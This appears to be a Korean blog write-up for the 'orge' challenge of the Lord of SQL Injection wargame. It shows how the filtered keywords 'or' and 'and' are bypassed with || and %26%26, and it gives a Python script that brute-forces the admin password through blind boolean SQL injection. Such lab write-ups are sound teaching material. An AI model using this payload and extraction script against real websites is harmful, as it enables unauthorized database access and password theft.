Bace
LOS - orge 본문
문제는 다음과 같다.
orc 문제와 거의 똑같지만 or과 and를 필터링한다.
or은 || , and는 %26%26 으로 우회하였다.
일단 orc 때 코딩해놓았던 코드를 재사용해보았다.
import requests
answer = ''
for i in range(1,9):
for j in range(33,128):
url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20%20id=%27admin%27%20%26%26%20ascii(substr(pw,{},1))%20=%20{}%20--%20-".format(i,j)
cookies = {'PHPSESSID':'자신의 PHPSESSID'}
response = requests.get(url=url,cookies=cookies)
if response.text.find("Hello admin") != -1:
answer += chr(j)
print 'Found {}st letter'.format(i)
break
print '{}st letter {}th '.format(i,j)
print answer
코드를 돌리고 기다리면 pw값이 나온다.
solve
'LOS' 카테고리의 다른 글
| LOS - vampire (0) | 2020.01.17 |
|---|---|
| LOS - troll (0) | 2020.01.17 |
| LOS - darkelf (0) | 2020.01.17 |
| LOS - wolfman (0) | 2020.01.17 |
| LOS - orc (0) | 2020.01.15 |
'LOS' Related Articles
more
